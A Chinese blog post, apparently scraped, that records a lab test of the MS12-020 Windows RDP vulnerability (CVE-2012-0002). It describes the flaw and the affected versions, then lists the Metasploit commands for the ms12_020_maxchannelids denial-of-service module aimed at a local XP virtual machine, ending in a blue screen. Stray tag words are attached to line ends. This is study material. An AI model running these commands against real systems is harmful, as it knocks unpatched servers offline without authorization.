关于MS12-020一次简单尝试
正好这几天不忙,就想着慢慢学习,再写点简单的东西,进行总结记录。windows
此次尝试的是MS12-020,可致使BSOD(死亡蓝屏)服务器
MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞,学习
远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。Windows在处理某些对象时存在错误,可经过特制的RDP报文访问未初始化的或已经删除的对象,致使任意代码执行,而后控制系统。spa
CVE ID: CVE-2012-0002对象
影响范围:开了RDP的Microsoft Windows XP Professional /Microsoft Windows XP Home/ Microsoft Windows Server 2003 Standard Edition /Microsoft Windows Server 2003 Enterprise Edition /Microsoft Windows Server 2003 Datacenter Edition /Microsoft Windows 7(绿盟说是影响全版本windows系统,当时win8和win10还未出)blog
补丁地址:https://technet.microsoft.com/library/security/ms12-020it
首先肯定kali为攻击机,windows xp professional service park 2为靶机。固然,开启了远程桌面,也没打补丁。io
接下来,打开msfconsole,输入命令search ms12-020console
可选择的模块有2个,咱们先选择第一个进行。尝试。class
输入命令:use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 而后回车
进入这个模块后,查看当下的配置。
show options
而后设置靶机IP。
set RHOST 192.168.19.130
最后,输入run,回车运行。
当提示seems down时,查看靶机状况。
如图所示,RPDWD.SYS引发的蓝屏。
- 1. ThreeJs:一、简单的尝试
- 2. Django 简单尝试
- 3. 对于Jetpack Compose的一次尝试
- 4. 一次构建简单HTTP框架的尝试 —— Golang实现
- 5. 栈溢出攻击的一次简单尝试
- 6. 关于b站爬虫的尝试(一)
- 7. Python 爬虫简单尝试
- 8. easyexcel简单尝试springboot
- 9. 简单尝试Spring Cloud Gateway
- 10. kali syn flood 简单尝试
- 更多相关文章...
- • 一对一关联查询 - MyBatis教程
- • 一对多关联查询 - MyBatis教程
- • NewSQL-TiDB相关
- • Github 简明教程
-
每一个你不满意的现在,都有一个你没有努力的曾经。